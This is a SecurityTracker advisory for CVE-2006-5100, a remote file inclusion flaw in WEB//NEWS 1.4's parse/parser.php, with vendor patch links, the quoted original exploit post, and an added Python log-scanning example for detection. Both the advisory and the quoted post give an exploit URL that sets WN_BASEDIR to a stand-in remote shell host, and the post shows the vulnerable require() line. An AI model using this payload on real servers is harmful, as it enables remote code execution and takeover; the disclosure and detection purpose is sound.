SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   WEB//NEWS
Vendors:   Stylemotion.de
WEB//NEWS Include File Flaw in 'parse/parser.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016938
SecurityTracker URL:  http://securitytracker.com/id/1016938
CVE Reference:   CVE-2006-5100
Updated:  Jun 3 2008
Original Entry Date:  Sep 27 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.4 prior to Build 26092006-01
Description:   ThE-WoLf-KsA reported a vulnerability in WEB//NEWS. A remote user can execute arbitrary code on the target system.

The 'parse/parser.php' script does not properly validate user-supplied input in the 'WN_BASEDIR' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[scriptPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (Version 1.4 Build 26092006-01).

Also, a patch (1.4 security patch 2) is available at:

http://www.stylemotion.de/downloads-id3-web-news-1-4-sicherheits-patch-2.html

The stylemotion.de advisory is available at:

http://www.stylemotion.de/forum/thread-1978-1-sicherheitspatch.html

Vendor URL:  www.stylemotion.de/webnews.html
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
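
A log check for the request pattern in the Description, added here as an example (not code from the advisory, the reporter or the vendor): it flags requests to 'parse/parser.php' that carry a 'WN_BASEDIR' query parameter and marks those whose value begins with a URL scheme. The log lines, host names, function names and the 'param-override' label are constructed for illustration, and it assumes legitimate clients never send this parameter.

```python
import re
from urllib.parse import parse_qs, urlsplit

REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# URL schemes and PHP stream wrappers that point an include path off-host.
REMOTE_SCHEME = re.compile(r"^\s*(?:https?|ftps?|php|data):", re.IGNORECASE)

SAMPLE_LOG = [  # constructed access-log lines, not captured traffic
    '192.0.2.10 - - [27/Sep/2006:10:01:02 +0000] "GET /news/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [27/Sep/2006:10:03:17 +0000] "GET /news/parse/parser.php?WN_BASEDIR=http://files.example/x.txt? HTTP/1.1" 200 312',
    '192.0.2.44 - - [27/Sep/2006:10:03:40 +0000] "GET /news/parse/parser.php?WN_BASEDIR=hTtP%3A%2F%2Ffiles.example%2Fx.txt HTTP/1.1" 200 312',
    '192.0.2.77 - - [27/Sep/2006:10:05:00 +0000] "GET /news/parse/parser.php?WN_BASEDIR=/var/www/news HTTP/1.1" 200 40',
]

def classify(request_target):
    """Return None, 'param-override' or 'remote-include' for one request target."""
    try:
        parts = urlsplit(request_target)
    except ValueError:
        return None
    if not parts.path.lower().endswith("/parse/parser.php"):
        return None
    # parse_qs percent-decodes once, so encoded schemes are compared in clear.
    values = parse_qs(parts.query, keep_blank_values=True).get("WN_BASEDIR", [])
    if not values:
        return None
    if any(REMOTE_SCHEME.match(value) for value in values):
        return "remote-include"
    # Assumption: the base directory is server-side state a client never sets.
    return "param-override"

def scan(lines):
    """Return (line_number, verdict, request_target) for each flagged line."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            findings.append((number, verdict, match.group(1)))
    return findings
```

Access logs record only the request line, so a 'WN_BASEDIR' value delivered any other way would not appear in this scan.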

Message History:   None.


 Source Message Contents

Subject:  webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

#==============================================================================================
#webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#
#
#Version : v1.4
#
#================================================================================================
#Bug in : parse/parser.php
#
#Vuln Code :
#--------------------------------
#
#            require($WN_BASEDIR."/parse/parser.php");
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com[scriptPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
#
#================================================================================================
#Discovered By : ThE-WoLf-KsA
#
#Contact : the-wolf-ksa[at]hotmail.com
#XP10_hackEr Team
#
#WWW.XP10.COM
==================================================================================================

vendor:
http://www.stylemotion.de/downloads-id1-web-news-1-4.html


Copyright 2020, SecurityGlobal.net LLC